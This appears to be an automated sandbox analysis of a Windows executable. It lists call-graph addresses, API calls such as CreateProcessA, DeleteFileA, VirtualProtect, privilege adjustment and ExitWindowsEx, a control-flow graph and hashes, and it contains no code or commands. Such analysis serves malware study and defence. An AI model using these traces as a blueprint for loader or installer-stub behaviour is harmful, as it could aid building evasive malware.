5691->5682 5692 4034f0 18 API calls 5691->5692 5693 406f0e 5692->5693 5694 406f20 5693->5694 5696 403420 18 API calls 5693->5696 5695 4031e8 18 API calls 5694->5695 5695->5682 5696->5694 5698 408e8e 5697->5698 5700 408ea6 5698->5700 5710 408e18 5698->5710 5701 408e18 18 API calls 5700->5701 5702 408eca 5700->5702 5701->5702 5703 407918 InterlockedExchange 5702->5703 5704 408ee5 5703->5704 5705 408e18 18 API calls 5704->5705 5707 408ef8 5704->5707 5705->5707 5706 408e18 18 API calls 5706->5707 5707->5706 5708 403278 18 API calls 5707->5708 5709 408f27 5707->5709 5708->5707 5709->5638 5711 405890 18 API calls 5710->5711 5712 408e29 5711->5712 5712->5700 5762 406a58 5713->5762 5716 406d26 5718 406a58 19 API calls 5716->5718 5720 406d72 5716->5720 5719 406d36 5718->5719 5721 406d42 5719->5721 5723 406a34 21 API calls 5719->5723 5770 406888 5720->5770 5721->5720 5724 406d67 5721->5724 5727 406a58 19 API calls 5721->5727 5723->5721 5724->5720 5782 406cc8 GetWindowsDirectoryA 5724->5782 5729 406d5b 5727->5729 5728 406638 19 API calls 5730 406d87 5728->5730 5729->5724 5732 406a34 21 API calls 5729->5732 5731 40322c 4 API calls 5730->5731 5733 406d91 5731->5733 5732->5724 5734 4031b8 4 API calls 5733->5734 5735 406dab 5734->5735 5735->5563 5737 409244 5736->5737 5738 406638 19 API calls 5737->5738 5739 40925d 5738->5739 5740 40322c 4 API calls 5739->5740 5745 409268 5740->5745 5742 406978 20 API calls 5742->5745 5743 4033b4 18 API calls 5743->5745 5744 408dd8 18 API calls 5744->5745 5745->5742 5745->5743 5745->5744 5747 405890 18 API calls 5745->5747 5748 4092e4 5745->5748 5822 4091b0 5745->5822 5830 409034 5745->5830 5747->5745 5749 40322c 4 API calls 5748->5749 5750 4092ef 5749->5750 5751 4031b8 4 API calls 5750->5751 5752 409309 5751->5752 5753 403198 4 API calls 5752->5753 5754 409311 5753->5754 5754->5563 5756 4051a8 33 API calls 5755->5756 5757 404cb2 5756->5757 5757->5563 5759 408dc8 5758->5759 5858 408c80 5759->5858 5763 4034f0 18 API calls 5762->5763 5764 406a6b 5763->5764 5765 406a82 GetEnvironmentVariableA 5764->5765 5769 406a95 5764->5769 5784 406dec 5764->5784 5765->5764 5766 406a8e 5765->5766 5767 403198 4 API calls 5766->5767 5767->5769 5769->5716 5779 406a34 5769->5779 5771 403414 5770->5771 5772 4068ab GetFullPathNameA 5771->5772 5773 4068b7 5772->5773 5774 4068ce 5772->5774 5773->5774 5775 4068bf 5773->5775 5776 40322c 4 API calls 5774->5776 5777 403278 18 API calls 5775->5777 5778 4068cc 5776->5778 5777->5778 5778->5728 5788 4069dc 5779->5788 5783 406ce9 5782->5783 5783->5720 5785 406dfa 5784->5785 5786 4034f0 18 API calls 5785->5786 5787 406e08 5786->5787 5787->5764 5795 406978 5788->5795 5790 4069fe 5791 406a06 GetFileAttributesA 5790->5791 5792 406a1b 5791->5792 5793 403198 4 API calls 5792->5793 5794 406a23 5793->5794 5794->5716 5805 406744 5795->5805 5797 4069b0 5800 4069c6 5797->5800 5801 4069bb 5797->5801 5799 406989 5799->5797 5812 406970 CharPrevA 5799->5812 5813 403454 5800->5813 5802 40322c 4 API calls 5801->5802 5804 4069c4 5802->5804 5804->5790 5809 406755 5805->5809 5806 4067b9 5807 4067b4 5806->5807 5808 406680 IsDBCSLeadByte 5806->5808 5807->5799 5808->5807 5809->5806 5811 406773 5809->5811 5811->5807 5820 406680 IsDBCSLeadByte 5811->5820 5812->5799 5814 403486 5813->5814 5816 403459 5813->5816 5815 403198 4 API calls 5814->5815 5817 40347c 5815->5817 5816->5814 5818 40346d 5816->5818 5817->5804 5819 403278 18 API calls 5818->5819 5819->5817 5821 406694 5820->5821 5821->5811 5823 403198 4 API calls 5822->5823 5826 4091d1 5823->5826 5827 4091fe 5826->5827 5839 4032a8 5826->5839 5842 403494 5826->5842 5828 403198 4 API calls 5827->5828 5829 409213 5828->5829 5829->5745 5846 408f70 5830->5846 5832 40904a 5833 40904e 5832->5833 5852 406a48 5832->5852 5833->5745 5836 409081 5855 408fac 5836->5855 5840 403278 18 API calls 5839->5840 5841 4032b5 5840->5841 5841->5826 5843 4034c3 5842->5843 5844 403498 5842->5844 5843->5826 5845 4034f0 18 API calls 5844->5845 5845->5843 5847 408f7a 5846->5847 5848 408f7e 5846->5848 5847->5832 5849 408fa0 SetLastError 5848->5849 5850 408f87 Wow64DisableWow64FsRedirection 5848->5850 5851 408f9b 5849->5851 5850->5851 5851->5832 5853 4069dc 21 API calls 5852->5853 5854 406a52 GetLastError 5853->5854 5854->5836 5856 408fb1 Wow64RevertWow64FsRedirection 5855->5856 5857 408fbb 5855->5857 5856->5857 5857->5745 5859 403198 4 API calls 5858->5859 5866 408cb1 5858->5866 5859->5866 5860 408cdc 5861 4031b8 4 API calls 5860->5861 5862 408d69 5861->5862 5862->5563 5863 408cc8 5865 4032fc 18 API calls 5863->5865 5864 403278 18 API calls 5864->5866 5865->5860 5866->5860 5866->5863 5866->5864 5867 4032fc 18 API calls 5866->5867 5867->5866 5869 406744 IsDBCSLeadByte 5868->5869 5871 406835 5869->5871 5870 40687f 5870->5570 5871->5870 5872 406680 IsDBCSLeadByte 5871->5872 5872->5871 5874 4068f3 5873->5874 5875 406820 IsDBCSLeadByte 5874->5875 5877 4068fe 5875->5877 5876 4066ea 5876->5575 5876->5576 5877->5876 5878 406680 IsDBCSLeadByte 5877->5878 5878->5877 5880 406957 5879->5880 5881 40695b 5879->5881 5880->5590 5884 406970 CharPrevA 5881->5884 5883 40696c 5883->5590 5884->5883 5886 402bd5 RaiseException 5885->5886 5887 402be6 5885->5887 5886->5887 5887->5613 6140 402e64 6141 402e69 6140->6141 6142 402e7a RtlUnwind 6141->6142 6143 402e5e 6141->6143 6144 402e9d 6142->6144 6157 40667c IsDBCSLeadByte 6158 406694 6157->6158 6666 403f7d 6668 403fa2 6666->6668 6670 403f84 6666->6670 6667 403f8c 6669 403e8e 4 API calls 6668->6669 6668->6670 6669->6670 6670->6667 6671 402674 4 API calls 6670->6671 6672 403fca 6671->6672 6679 403d02 6684 403d12 6679->6684 6680 403ddf ExitProcess 6681 403db8 6682 403cc8 4 API calls 6681->6682 6683 403dc2 6682->6683 6686 403cc8 4 API calls 6683->6686 6684->6680 6684->6681 6685 403dea 6684->6685 6689 403da4 6684->6689 6690 403d8f MessageBoxA 6684->6690 6687 403dcc 6686->6687 6699 4019dc 6687->6699 6695 403fe4 6689->6695 6690->6681 6691 403dd1 6691->6680 6691->6685 6696 403fe8 6695->6696 6697 403f07 4 API calls 6696->6697 6698 404006 6697->6698 6700 401abb 6699->6700 6701 4019ed 6699->6701 6700->6691 6702 401a04 RtlEnterCriticalSection 6701->6702 6703 401a0e LocalFree 6701->6703 6702->6703 6704 401a41 6703->6704 6705 401a2f VirtualFree 6704->6705 6706 401a49 6704->6706 6705->6704 6707 401a70 LocalFree 6706->6707 6708 401a87 6706->6708 6707->6707 6707->6708 6709 401aa9 RtlDeleteCriticalSection 6708->6709 6710 401a9f RtlLeaveCriticalSection 6708->6710 6709->6691 6710->6709 6163 404206 6164 4041cc 6163->6164 6167 40420a 6163->6167 6165 404282 6166 403154 4 API calls 6168 404323 6166->6168 6167->6165 6167->6166 6169 402c08 6172 402c82 6169->6172 6173 402c19 6169->6173 6170 402c56 RtlUnwind 6171 403154 4 API calls 6170->6171 6171->6172 6173->6170 6173->6172 6176 402b28 6173->6176 6177 402b31 RaiseException 6176->6177 6178 402b47 6176->6178 6177->6178 6178->6170 6179 408c10 6180 408c17 6179->6180 6181 403198 4 API calls 6180->6181 6189 408cb1 6181->6189 6182 408cdc 6183 4031b8 4 API calls 6182->6183 6184 408d69 6183->6184 6185 408cc8 6187 4032fc 18 API calls 6185->6187 6186 403278 18 API calls 6186->6189 6187->6182 6188 4032fc 18 API calls 6188->6189 6189->6182 6189->6185 6189->6186 6189->6188 6190 40a011 6191 40a036 6190->6191 6192 407918 InterlockedExchange 6191->6192 6193 40a060 6192->6193 6194 40a070 6193->6194 6195 409aa0 18 API calls 6193->6195 6200 4076ac SetEndOfFile 6194->6200 6195->6194 6197 40a08c 6198 4025ac 4 API calls 6197->6198 6199 40a0c3 6198->6199 6201 4076c3 6200->6201 6202 4076bc 6200->6202 6201->6197 6203 40748c 35 API calls 6202->6203 6203->6201 6711 409916 6712 409918 6711->6712 6713 40993a 6712->6713 6714 409956 CallWindowProcA 6712->6714 6714->6713 5939 407017 5940 407008 SetErrorMode 5939->5940 6208 403018 6209 403070 6208->6209 6210 403025 6208->6210 6211 40302a RtlUnwind 6210->6211 6212 40304e 6211->6212 6214 402f78 6212->6214 6215 402be8 6212->6215 6216 402bf1 RaiseException 6215->6216 6217 402c04 6215->6217 6216->6217 6217->6209 6721 409918 6722 40993a 6721->6722 6724 409927 6721->6724 6723 409956 CallWindowProcA 6723->6722 6724->6722 6724->6723 6222 40901e 6223 409010 6222->6223 6224 408fac Wow64RevertWow64FsRedirection 6223->6224 6225 409018 6224->6225 6226 409020 SetLastError 6227 409029 6226->6227 6242 403a28 ReadFile 6243 403a46 6242->6243 6244 403a49 GetLastError 6242->6244 6077 40762c ReadFile 6078 407663 6077->6078 6079 40764c 6077->6079 6080 407652 GetLastError 6079->6080 6081 40765c 6079->6081 6080->6078 6080->6081 6082 40748c 35 API calls 6081->6082 6082->6078 6249 40a02c 6250 409aa0 18 API calls 6249->6250 6251 40a031 6250->6251 6252 40a036 6251->6252 6253 402f24 5 API calls 6251->6253 6254 407918 InterlockedExchange 6252->6254 6253->6252 6255 40a060 6254->6255 6256 40a070 6255->6256 6257 409aa0 18 API calls 6255->6257 6258 4076ac 36 API calls 6256->6258 6257->6256 6259 40a08c 6258->6259 6260 4025ac 4 API calls 6259->6260 6261 40a0c3 6260->6261 6729 40712e 6730 407118 6729->6730 6731 403198 4 API calls 6730->6731 6732 407120 6731->6732 6733 403198 4 API calls 6732->6733 6734 407128 6733->6734 6735 408f30 6738 408dfc 6735->6738 6739 408e05 6738->6739 6740 403198 4 API calls 6739->6740 6741 408e13 6739->6741 6740->6739 6742 403932 6743 403924 6742->6743 6746 40374c 6743->6746 6745 40392c 6747 403766 6746->6747 6748 403759 6746->6748 6747->6745 6748->6747 6749 403779 VariantClear 6748->6749 6749->6745 5888 4075c4 SetFilePointer 5889 4075f7 5888->5889 5890 4075e7 GetLastError 5888->5890 5890->5889 5891 4075f0 5890->5891 5892 40748c 35 API calls 5891->5892 5892->5889 6262 4076c8 WriteFile 6263 4076e8 6262->6263 6264 4076ef 6262->6264 6266 40748c 35 API calls 6263->6266 6265 407700 6264->6265 6267 4073ec 34 API calls 6264->6267 6266->6264 6267->6265 6268 40a2ca 6277 4096fc 6268->6277 6271 402f24 5 API calls 6272 40a2d4 6271->6272 6273 403198 4 API calls 6272->6273 6274 40a2f3 6273->6274 6275 403198 4 API calls 6274->6275 6276 40a2fb 6275->6276 6286 4056ac 6277->6286 6279 409745 6282 403198 4 API calls 6279->6282 6280 409717 6280->6279 6292 40720c 6280->6292 6284 40975a 6282->6284 6283 409735 6285 40973d MessageBoxA 6283->6285 6284->6271 6285->6279 6287 403154 4 API calls 6286->6287 6289 4056b1 6287->6289 6288 4056c9 6288->6280 6289->6288 6290 403154 4 API calls 6289->6290 6291 4056bf 6290->6291 6291->6280 6293 4056ac 4 API calls 6292->6293 6294 40721b 6293->6294 6295 407221 6294->6295 6296 40722f 6294->6296 6297 40322c 4 API calls 6295->6297 6298 40723f 6296->6298 6300 40724b 6296->6300 6301 40722d 6297->6301 6303 4071d0 6298->6303 6310 4032b8 6300->6310 6301->6283 6304 40322c 4 API calls 6303->6304 6305 4071df 6304->6305 6306 4071fc 6305->6306 6307 406950 CharPrevA 6305->6307 6306->6301 6308 4071eb 6307->6308 6308->6306 6309 4032fc 18 API calls 6308->6309 6309->6306 6311 403278 18 API calls 6310->6311 6312 4032c2 6311->6312 6312->6301 6313 402ccc 6316 402cfe 6313->6316 6318 402cdd 6313->6318 6314 402d88 RtlUnwind 6315 403154 4 API calls 6314->6315 6315->6316 6317 402b28 RaiseException 6319 402d7f 6317->6319 6318->6314 6318->6316 6318->6317 6319->6314 6758 403fcd 6759 403f07 4 API calls 6758->6759 6760 403fd6 6759->6760 6761 403e9c 4 API calls 6760->6761 6762 403fe2 6761->6762 6320 4024d0 6321 4024e4 6320->6321 6322 4024e9 6320->6322 6325 401918 4 API calls 6321->6325 6323 402518 6322->6323 6324 40250e RtlEnterCriticalSection 6322->6324 6327 4024ed 6322->6327 6335 402300 6323->6335 6324->6323 6325->6322 6329 402525 6331 402581 6329->6331 6332 402577 RtlLeaveCriticalSection 6329->6332 6330 401fd4 14 API calls 6333 402531 6330->6333 6332->6331 6333->6329 6345 40215c 6333->6345 6336 402314 6335->6336 6339 402335 6336->6339 6340 4023b8 6336->6340 6337 402344 6337->6329 6337->6330 6339->6337 6359 401b74 6339->6359 6340->6337 6343 402455 6340->6343 6362 401d80 6340->6362 6366 401e84 6340->6366 6343->6337 6344 401d00 9 API calls 6343->6344 6344->6337 6346 40217a 6345->6346 6347 402175 6345->6347 6348 4021ab RtlEnterCriticalSection 6346->6348 6351 4021b5 6346->6351 6353 40217e 6346->6353 6349 401918 4 API calls 6347->6349 6348->6351 6349->6346 6350 4021c1 6354 4022e3 RtlLeaveCriticalSection 6350->6354 6355 4022ed 6350->6355 6351->6350 6352 402244 6351->6352 6357 402270 6351->6357 6352->6353 6356 401d80 7 API calls 6352->6356 6353->6329 6354->6355 6355->6329 6356->6353 6357->6350 6358 401d00 7 API calls 6357->6358 6358->6350 6360 40215c 9 API calls 6359->6360 6361 401b95 6360->6361 6361->6337 6363 401d92 6362->6363 6364 401d89 6362->6364 6363->6340 6364->6363 6365 401b74 9 API calls 6364->6365 6365->6363 6371 401768 6366->6371 6368 401e99 6369 401ea6 6368->6369 6382 401dcc 6368->6382 6369->6340 6372 401787 6371->6372 6373 40183b 6372->6373 6374 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6372->6374 6375 40132c LocalAlloc 6372->6375 6377 401821 6372->6377 6379 4017d6 6372->6379 6380 4017e7 6373->6380 6393 4015c4 6373->6393 6374->6372 6375->6372 6378 40150c VirtualFree 6377->6378 6378->6380 6389 40150c 6379->6389 6380->6368 6383 401d80 9 API calls 6382->6383 6384 401de0 6383->6384 6397 40132c 6384->6397 6386 401df0 6388 401df8 6386->6388 6401 401b44 6386->6401 6388->6369 6392 40153b 6389->6392 6390 401594 6390->6380 6391 401568 VirtualFree 6391->6392 6392->6390 6392->6391 6395 40160a 6393->6395 6394 40163a 6394->6380 6395->6394 6396 401626 VirtualAlloc 6395->6396 6396->6394 6396->6395 6398 401348 6397->6398 6406 4012e4 6398->6406 6402 401b61 6401->6402 6403 401b52 6401->6403 6402->6388 6404 401d00 9 API calls 6403->6404 6405 401b5f 6404->6405 6405->6388 6409 40128c 6406->6409 6410 401298 LocalAlloc 6409->6410 6411 4012aa 6409->6411 6410->6411 6411->6386 6412 4028d2 6413 4028da 6412->6413 6414 403554 4 API calls 6413->6414 6415 4028ef 6413->6415 6414->6413 6416 4025ac 4 API calls 6415->6416 6417 4028f4 6416->6417 6763 4019d3 6764 4019ba 6763->6764 6765 4019c3 RtlLeaveCriticalSection 6764->6765 6766 4019cd 6764->6766 6765->6766 5893 407fd4 5894 407fe6 5893->5894 5896 407fed 5893->5896 5904 407f10 5894->5904 5897 408021 5896->5897 5899 408015 5896->5899 5900 408017 5896->5900 5898 40804e 5897->5898 5902 407d7c 33 API calls 5897->5902 5918 407e2c 5899->5918 5915 407d7c 5900->5915 5902->5898 5905 407f25 5904->5905 5906 407d7c 33 API calls 5905->5906 5907 407f34 5905->5907 5906->5907 5908 407f6e 5907->5908 5909 407d7c 33 API calls 5907->5909 5910 407f82 5908->5910 5911 407d7c 33 API calls 5908->5911 5909->5908 5914 407fae 5910->5914 5925 407eb8 5910->5925 5911->5910 5914->5896 5928 4058c4 5915->5928 5917 407d9e 5917->5897 5919 405194 33 API calls 5918->5919 5920 407e57 5919->5920 5936 407de4 5920->5936 5922 407e5f 5923 403198 4 API calls 5922->5923 5924 407e74 5923->5924 5924->5897 5926 407ec7 VirtualFree 5925->5926 5927 407ed9 VirtualAlloc 5925->5927 5926->5927 5927->5914 5929 4058d0 5928->5929 5930 405194 33 API calls 5929->5930 5931 4058fd 5930->5931 5932 4031e8 18 API calls 5931->5932 5933 405908 5932->5933 5934 403198 4 API calls 5933->5934 5935 40591d 5934->5935 5935->5917 5937 4058c4 33 API calls 5936->5937 5938 407e06 5937->5938 5938->5922 6422 405ad4 6423 405ae4 6422->6423 6424 405adc 6422->6424 6425 405ae2 6424->6425 6426 405aeb 6424->6426 6429 405a4c 6425->6429 6427 405940 19 API calls 6426->6427 6427->6423 6430 405a54 6429->6430 6431 405a6e 6430->6431 6432 403154 4 API calls 6430->6432 6433 405a73 6431->6433 6434 405a8a 6431->6434 6432->6430 6436 405940 19 API calls 6433->6436 6435 403154 4 API calls 6434->6435 6437 405a8f 6435->6437 6438 405a86 6436->6438 6439 4059b0 33 API calls 6437->6439 6440 403154 4 API calls 6438->6440 6439->6438 6441 405ab8 6440->6441 6442 403154 4 API calls 6441->6442 6443 405ac6 6442->6443 6443->6423 6444 40a0d5 6445 40a105 6444->6445 6446 40a10f CreateWindowExA SetWindowLongA 6445->6446 6447 405194 33 API calls 6446->6447 6448 40a192 6447->6448 6449 4032fc 18 API calls 6448->6449 6450 40a1a0 6449->6450 6451 4032fc 18 API calls 6450->6451 6452 40a1ad 6451->6452 6453 406b7c 19 API calls 6452->6453 6454 40a1b9 6453->6454 6455 4032fc 18 API calls 6454->6455 6456 40a1c2 6455->6456 6457 4099a4 43 API calls 6456->6457 6458 40a1d4 6457->6458 6459 409884 19 API calls 6458->6459 6460 40a1e7 6458->6460 6459->6460 6461 40a220 6460->6461 6462 4094d8 9 API calls 6460->6462 6463 40a239 6461->6463 6466 40a233 RemoveDirectoryA 6461->6466 6462->6461 6464 40a242 DestroyWindow 6463->6464 6465 40a24d 6463->6465 6464->6465 6467 40a275 6465->6467 6468 40357c 4 API calls 6465->6468 6466->6463 6469 40a26b 6468->6469 6470 4025ac 4 API calls 6469->6470 6470->6467 5941 40a0e7 5942 40a0eb SetLastError 5941->5942 5973 409648 GetLastError 5942->5973 5945 40a105 5947 40a10f CreateWindowExA SetWindowLongA 5945->5947 5946 402f24 5 API calls 5946->5945 5948 405194 33 API calls 5947->5948 5949 40a192 5948->5949 5950 4032fc 18 API calls 5949->5950 5951 40a1a0 5950->5951 5952 4032fc 18 API calls 5951->5952 5953 40a1ad 5952->5953 5986 406b7c GetCommandLineA 5953->5986 5956 4032fc 18 API calls 5957 40a1c2 5956->5957 5991 4099a4 5957->5991 5960 409884 19 API calls 5961 40a1e7 5960->5961 5962 40a220 5961->5962 5963 40a207 5961->5963 5965 40a239 5962->5965 5968 40a233 RemoveDirectoryA 5962->5968 6007 4094d8 5963->6007 5966 40a242 DestroyWindow 5965->5966 5967 40a24d 5965->5967 5966->5967 5969 40a275 5967->5969 6015 40357c 5967->6015 5968->5965 5971 40a26b 5972 4025ac 4 API calls 5971->5972 5972->5969 5974 404c94 33 API calls 5973->5974 5975 40968f 5974->5975 5976 407284 19 API calls 5975->5976 5977 40969f 5976->5977 5978 408da8 18 API calls 5977->5978 5979 4096b4 5978->5979 5980 405890 18 API calls 5979->5980 5981 4096c3 5980->5981 5982 4031b8 4 API calls 5981->5982 5983 4096e2 5982->5983 5984 403198 4 API calls 5983->5984 5985 4096ea 5984->5985 5985->5945 5985->5946 5987 406af0 18 API calls 5986->5987 5988 406ba1 5987->5988 5989 403198 4 API calls 5988->5989 5990 406bbf 5989->5990 5990->5956 5992 4033b4 18 API calls 5991->5992 5993 4099df 5992->5993 5994 409a11 CreateProcessA 5993->5994 5995 409a24 CloseHandle 5994->5995 5996 409a1d 5994->5996 5998 409a2d 5995->5998 5997 409648 35 API calls 5996->5997 5997->5995 6028 409978 5998->6028 6001 409a49 6002 409978 3 API calls 6001->6002 6003 409a4e GetExitCodeProcess CloseHandle 6002->6003 6004 409a6e 6003->6004 6005 403198 4 API calls 6004->6005 6006 409a76 6005->6006 6006->5960 6006->5961 6008 409532 6007->6008 6010 4094eb 6007->6010 6008->5962 6009 4094f3 Sleep 6009->6010 6010->6008 6010->6009 6011 409503 Sleep 6010->6011 6013 40951a GetLastError 6010->6013 6032 408fbc 6010->6032 6011->6010 6013->6008 6014 409524 GetLastError 6013->6014 6014->6008 6014->6010 6016 403591 6015->6016 6017 4035a0 6015->6017 6022 4035d0 6016->6022 6023 40359b 6016->6023 6025 4035b6 6016->6025 6018 4035b1 6017->6018 6019 4035b8 6017->6019 6020 403198 4 API calls 6018->6020 6021 4031b8 4 API calls 6019->6021 6020->6025 6021->6025 6022->6025 6026 40357c 4 API calls 6022->6026 6023->6017 6024 4035ec 6023->6024 6024->6025 6040 403554 6024->6040 6025->5971 6026->6022 6029 40998c PeekMessageA 6028->6029 6030 409980 TranslateMessage DispatchMessageA 6029->6030 6031 40999e MsgWaitForMultipleObjects 6029->6031 6030->6029 6031->5998 6031->6001 6033 408f70 2 API calls 6032->6033 6034 408fd2 6033->6034 6035 408fd6 6034->6035 6036 408ff2 DeleteFileA GetLastError 6034->6036 6035->6010 6037 409010 6036->6037 6038 408fac Wow64RevertWow64FsRedirection 6037->6038 6039 409018 6038->6039 6039->6010 6041 403566 6040->6041 6043 403578 6041->6043 6044 403604 6041->6044 6043->6024 6045 40357c 6044->6045 6046 4035a0 6045->6046 6051 40359b 6045->6051 6052 4035b6 6045->6052 6053 4035d0 6045->6053 6047 4035b1 6046->6047 6048 4035b8 6046->6048 6049 403198 4 API calls 6047->6049 6050 4031b8 4 API calls 6048->6050 6049->6052 6050->6052 6051->6046 6054 4035ec 6051->6054 6052->6041 6053->6052 6055 40357c 4 API calls 6053->6055 6054->6052 6056 403554 4 API calls 6054->6056 6055->6053 6056->6054 6770 402be9 RaiseException 6771 402c04 6770->6771 6477 402af2 6478 402afe 6477->6478 6481 402ed0 6478->6481 6482 403154 4 API calls 6481->6482 6483 402ee0 6482->6483 6484 402b03 6483->6484 6486 402b0c 6483->6486 6487 402b25 6486->6487 6488 402b15 RaiseException 6486->6488 6487->6484 6488->6487 6772 402dfa 6773 402e26 6772->6773 6774 402e0d 6772->6774 6776 402ba4 6774->6776 6777 402bc9 6776->6777 6778 402bad 6776->6778 6777->6773 6779 402bb5 RaiseException 6778->6779 6779->6777 6780 4075fa GetFileSize 6781 407626 6780->6781 6782 407616 GetLastError 6780->6782 6782->6781 6783 40761f 6782->6783 6784 40748c 35 API calls 6783->6784 6784->6781 6785 406ffb 6786 407008 SetErrorMode 6785->6786 6493 403a80 CloseHandle 6494 403a90 6493->6494 6495 403a91 GetLastError 6493->6495 6496 40a282 6498 40a1f4 6496->6498 6497 40a220 6500 40a239 6497->6500 6503 40a233 RemoveDirectoryA 6497->6503 6498->6497 6499 4094d8 9 API calls 6498->6499 6499->6497 6501 40a242 DestroyWindow 6500->6501 6502 40a24d 6500->6502 6501->6502 6504 40a275 6502->6504 6505 40357c 4 API calls 6502->6505 6503->6500 6506 40a26b 6505->6506 6507 4025ac 4 API calls 6506->6507 6507->6504 6508 404283 6509 4042c3 6508->6509 6510 403154 4 API calls 6509->6510 6511 404323 6510->6511 6787 404185 6788 4041ff 6787->6788 6789 4041cc 6788->6789 6790 403154 4 API calls 6788->6790 6791 404323 6790->6791 6512 40a287 6513 40a290 6512->6513 6515 40a2bb 6512->6515 6522 409448 6513->6522 6517 403198 4 API calls 6515->6517 6516 40a295 6516->6515 6520 40a2b3 MessageBoxA 6516->6520 6518 40a2f3 6517->6518 6519 403198 4 API calls 6518->6519 6521 40a2fb 6519->6521 6520->6515 6523 409454 GetCurrentProcess OpenProcessToken 6522->6523 6524 4094af ExitWindowsEx 6522->6524 6525 409466 6523->6525 6526 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6523->6526 6524->6525 6525->6516 6526->6524 6526->6525 6527 403e87 6528 403e4c 6527->6528 6529 403e67 6528->6529 6530 403e62 6528->6530 6531 403e7b 6528->6531 6534 403e78 6529->6534 6540 402674 6529->6540 6536 403cc8 6530->6536 6533 402674 4 API calls 6531->6533 6533->6534 6538 403cd6 6536->6538 6537 403ceb 6537->6529 6538->6537 6539 402674 4 API calls 6538->6539 6539->6537 6541 403154 4 API calls 6540->6541 6542 40267a 6541->6542 6542->6534 6551 407e90 6552 407eb8 VirtualFree 6551->6552 6553 407e9d 6552->6553 6796 403991 6797 403983 6796->6797 6798 40374c VariantClear 6797->6798 6799 40398b 6798->6799 6556 403e95 6557 403e4c 6556->6557 6558 403e67 6557->6558 6559 403e62 6557->6559 6560 403e7b 6557->6560 6563 403e78 6558->6563 6564 402674 4 API calls 6558->6564 6561 403cc8 4 API calls 6559->6561 6562 402674 4 API calls 6560->6562 6561->6558 6562->6563 6564->6563 6565 403a97 6566 403aac 6565->6566 6567 403bbc GetStdHandle 6566->6567 6568 403b0e CreateFileA 6566->6568 6577 403ab2 6566->6577 6569 403c17 GetLastError 6567->6569 6582 403bba 6567->6582 6568->6569 6570 403b2c 6568->6570 6569->6577 6572 403b3b GetFileSize 6570->6572 6570->6582 6572->6569 6573 403b4e SetFilePointer 6572->6573 6573->6569 6578 403b6a ReadFile 6573->6578 6574 403be7 GetFileType 6576 403c02 CloseHandle 6574->6576 6574->6577 6576->6577 6578->6569 6579 403b8c 6578->6579 6580 403b9f SetFilePointer 6579->6580 6579->6582 6580->6569 6581 403bb0 SetEndOfFile 6580->6581 6581->6569 6581->6582 6582->6574 6582->6577 6804 405ba2 6806 405ba4 6804->6806 6805 405be0 6809 405940 19 API calls 6805->6809 6806->6805 6807 405bf7 6806->6807 6808 405bda 6806->6808 6812 404cdc 19 API calls 6807->6812 6808->6805 6810 405c4c 6808->6810 6817 405bf3 6809->6817 6811 4059b0 33 API calls 6810->6811 6811->6817 6814 405c20 6812->6814 6813 403198 4 API calls 6816 405c86 6813->6816 6815 4059b0 33 API calls 6814->6815 6815->6817 6817->6813 6818 408da4 6819 408dc8 6818->6819 6820 408c80 18 API calls 6819->6820 6821 408dd1 6820->6821 6583 402caa 6584 403154 4 API calls 6583->6584 6585 402caf 6584->6585 6836 4011aa 6837 4011ac GetStdHandle 6836->6837 6083 4076ac SetEndOfFile 6084 4076c3 6083->6084 6085 4076bc 6083->6085 6086 40748c 35 API calls 6085->6086 6086->6084 6586 4028ac 6587 402594 18 API calls 6586->6587 6588 4028b6 6587->6588 6589 401ab9 6590 401a96 6589->6590 6591 401aa9 RtlDeleteCriticalSection 6590->6591 6592 401a9f RtlLeaveCriticalSection 6590->6592 6592->6591

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 133 409bb3-409bc0 VirtualProtect 132->133 133->121
                                                                              APIs
                                                                              • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                              • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                              • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$ProtectQuery$InfoSystem
                                                                              • String ID:
                                                                              • API String ID: 2441996862-0
                                                                              • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                              • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                              • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                              • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
